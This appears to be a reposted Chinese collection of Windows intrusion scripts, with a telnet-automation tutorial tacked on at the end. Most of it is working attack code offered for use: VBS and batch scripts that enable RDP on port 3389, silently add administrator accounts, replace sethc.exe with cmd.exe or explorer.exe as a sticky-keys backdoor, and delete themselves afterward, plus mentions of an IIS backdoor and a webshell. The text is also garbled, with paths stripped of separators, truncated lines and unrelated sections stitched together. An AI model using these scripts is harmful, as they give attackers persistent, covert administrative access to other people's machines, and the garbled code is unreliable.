大家好,又见面了,我是你们的朋友全栈君。 xp、2003开3389 非net创建管理用户 Shift后门 自删除脚本 提权VBS 整理收集 2010年12月07日 xp、2003开3389 非net创建管理用户 Shift后门 自删除脚本 vbson error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = “.” Set StdOut = WScript.StdOut Set oReg=GetObject(“winmgmts:{impersonationLevel=impersonate}!\” &_ strComputer & “rootdefault:StdRegProv”) strKeyPath = “SYSTEMCurrentControlSetControlTerminal Server” oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = “SYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp” oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = “SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp” strKeyPath = “SYSTEMCurrentControlSetControlTerminal Server” strValueName = “fDenyTSConnections” dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = “SYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp” strValueName = “PortNumber” dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = “SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp” strValueName = “PortNumber” dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username=”HackEr”:password=”393214425″:end if:set wsnetwork=CreateObject(“WSCRIPT.NETWORK”):os=”WinNT://”&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&”/Administrators,group”):Set od=ob.Create(“user”,username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&”/”&username&”,user”):oe.Add(of.ADsPath)’wscript.echo of.ADsPath On Error Resume Next Dim obj, success Set obj = CreateObject(“WScript.Shell”) success = obj.run(“cmd /c takeown /f %SystemRoot%system32sethc.exe&echo y| cacls %SystemRoot%system32sethc.exe /G %USERNAME%:F© %SystemRoot%system32cmd.exe %SystemRoot%system32acmd.exe© %SystemRoot%system32sethc.exe %SystemRoot%system32asethc.exe&del %SystemRoot%system32sethc.exe&ren %SystemRoot%system32acmd.exe sethc.exe”, 0, True) CreateObject(“Scripting.FileSystemObject”).DeleteFile(WScript.ScriptName) 加用户 ——————————– echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>>3389.regecho “fDenyTSConnections”=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp]>>3389.reg echo “PortNumber”=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]>>3389.reg echo “PortNumber”=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg ————————————————- vbs加用户精简版 set w=createobject(“wscript.shell”):w.run “net user hack echoeye /add”,0:w.run “net localgroup administrators hack /add”,0 —————————————————– cmd.asp webshell 上传 —————————————————
——————————————————————– Shift后门 —————————————– @echo off cls echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo. echo Shift后门 By:Hack残少 QQ:297248524 echo. echo 使用方法:本文件执行完毕后, echo 在终端界面按Shift 5次即可登陆系统! echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo. copy c:windowsexplorer.exe c:windowssystem32sethc.exe echo 完成百分之 50 copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe echo 完成百分之 80 attrib c:windowssystem32sethc.exe h echo 完成百分之 90 attrib c:windowssystem32dllcachesethc.exe h echo 完成百分之 100 cls echo. echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo 后门安装完毕! echo. echo 感谢您使用Shift后门 echo. echo By:Hack残少 QQ:297248524 echo. echo http://www.shenmicaobi.com/ echo. echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo. echo. & pause exit ————————————————————– 不依靠CMD添加用户的VBS代码 set wsnetwork=CreateObject(“WSCRIPT.NETWORK”) os=”WinNT://”&wsnetwork.ComputerName Set ob=GetObject(os) ‘得到adsi接口,绑定 Set oe=GetObject(os&”/Administrators,group”) ‘属性,admin组 Set od=ob.Create(“user”,”test”) ‘建立用户 od.SetPassword “1234” ‘设置密码 od.SetInfo ‘保存 Set of=GetObject(os&”/test”,user) ‘得到用户 oe.add os&”/test” —————————————— 用vbs实现本地添加用户的脚本 Dim WshShell set WshShell = CreateObject(“wscript.Shell”) WshShell.Run “cmd /k” for i = 1 to 3 WScript.Sleep 500 WshShell.SendKeys “net user admin” & i & ” abcd@123 /add” WshShell.SendKeys “{ENTER}” next WshShell.SendKeys “exit” WshShell.SendKeys “{ENTER}” ——————————————— 上帝之门 执行成功 3389 管理员帐号任意密码登入 保存为.exe ———————— MZ ———————— IIs后门 ——————- help1=”IIS后门设置器 黑猫专用版” help2=”请输入正确的虚拟目录名称和映射的路径,格式如下” help3=” cscript.exe iis.vbs 虚拟目录的名称 映射的路径” help4=”例如: cscript.exe iis.vbs lh e:” set Args = Wscript.Arguments if args.count telnet_tmp.vbs echo WScript.Sleep 300 >>telnet_tmp.vbs echo sh.SendKeys “open 192.168.1.200” >>telnet_tmp.vbs echo WScript.Sleep 300 >>telnet_tmp.vbs echo sh.SendKeys “{ENTER}” >>telnet_tmp.vbs echo WScript.Sleep 300 >>telnet_tmp.vbs echo sh.SendKeys “engineer{ENTER}” >>telnet_tmp.vbs echo WScript.Sleep 300 >>telnet_tmp.vbs echo sh.SendKeys “ls {ENTER}”>>telnet_tmp.vbs start telnet cscript //nologo telnet_tmp.vbs del telnet_tmp.vbs 附录: 对于SendKeys这个命令可以send什么,我们可以看下面的列表: BACKSPACE {BACKSPACE}, {BS}, or {BKSP} BREAK {BREAK} CAPS LOCK {CAPSLOCK} DEL or DELETE {DELETE} or {DEL} DOWN ARROW {DOWN} END {END} ENTER {ENTER}or ~ ESC {ESC} HELP {HELP} HOME {HOME} INS or INSERT {INSERT} or {INS} LEFT ARROW {LEFT} NUM LOCK {NUMLOCK} PAGE DOWN {PGDN} PAGE UP {PGUP} PRINT SCREEN {PRTSC} RIGHT ARROW {RIGHT} SCROLL LOCK {SCROLLLOCK} TAB {TAB} UP ARROW {UP} F1 {F1} F2 {F2} F3 {F3} F4 {F4} F5 {F5} F6 {F6} F7 {F7} F8 {F8} F9 {F9} F10 {F10} F11 {F11} F12 {F12} F13 {F13} F14 {F14} F15 {F15} F16 {F16} SHIFT CTRL ^ ALT % 二。Linux平台 保证你的系统上存在expect这个可执行程序,保存以下代码到文件autoTelnet,并给与执行权限。详细操作察看命令expect #!/usr/bin/expect — set SERVER “192.168.1” set USER “myusername” set PASSWD “mypass” if { argv } else { spawn telnet SERVER.200 } expect “Password:” send “
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/193554.html原文链接:https://javaforall.cn